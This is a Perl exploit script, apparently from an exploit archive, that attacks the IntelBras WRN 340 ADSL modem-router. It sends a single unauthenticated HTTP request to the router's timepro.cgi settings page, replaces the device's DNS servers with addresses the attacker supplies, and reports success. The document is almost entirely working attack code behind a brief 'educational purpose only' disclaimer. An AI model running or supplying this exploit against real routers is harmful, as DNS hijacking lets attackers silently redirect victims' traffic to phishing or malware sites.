IntelBras WRN 340 Unauthenticated Remote DNS Changer Vulnerability

#!/usr/bin/perl
#
# IntelBras WRN 340 (ADSL Modem-Router) - Unauthenticated Remote DNS Change Exploit
#
# Discovered by: 
#  
# Gabriel P. Lipski -  gp[DOT]lipski[AT]gmail[DOT]com
#
# Brazil, sept. 2015.
#
#
# AVISO:
#
# Este codigo foi feito apenas para fins educacionais.
# NAO USE SEM A PERMISSAO DO DONO DA REDE-ALVO.
# Use por sua conta e risco!
#
#
# WARNING:
#
# This program is for educational purpose only.
# DO NOT USE IT WITHOUT PERMISSION OF TARGET-NETWORK OWNER.
# Use at your own risk!

use LWP::UserAgent;
use HTTP::Request;


if($#ARGV < 2){
  print "IntelBras WRN 340 (ADSL Modem-Router) - Unauthenticated Remote DNS Change Exploit\n";
  print "Usage: ./$0 <ip> <dns-1> <dns-2>\n";
  exit;
}


if($ARGV[1] =~ /(.+)\.(.+)\.(.+)\.(.+)/){ $DNS1 = $1; $DNS2 = $2; $DNS3 = $3; $DNS4 = $4; }

if($ARGV[2] =~ /(.+)\.(.+)\.(.+)\.(.+)/){ $DNS5 = $1; $DNS6 = $2; $DNS7 = $3; $DNS8 = $4; }


$sock = new LWP::UserAgent;
$sock->timeout(5);
$http = new HTTP::Request GET => "http://".$ARGV[0]."/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=".$DNS1."&fdns_dynamic2=".$DNS2."&fdns_dynamic3=".$DNS3."&fdns_dynamic4=".$DNS4."&sdns_dynamic1=".$DNS5."&sdns_dynamic2=".$DNS6."&sdns_dynamic3=".$DNS7."&sdns_dynamic4=".$DNS8."&userid=&passwd=&mtu=1454&ip1=192&ip2=168&ip3=254&ip4=2&sm1=255&sm2=255&sm3=255&sm4=0&gw1=192&gw2=168&gw3=254&gw4=254&fdns1=&fdns2=&fdns3=&fdns4=&sdns1=&sdns2=&sdns3=&sdns4=&static_mtu=1500";
$response = $sock->request($http);

if($response->content =~ /Definir Servidor DNS Manualmente/){
  print "Successfully exploited!\n";
}

else {
  print "Unknown error.\n";
}

#  0day.today [2018-01-03]  #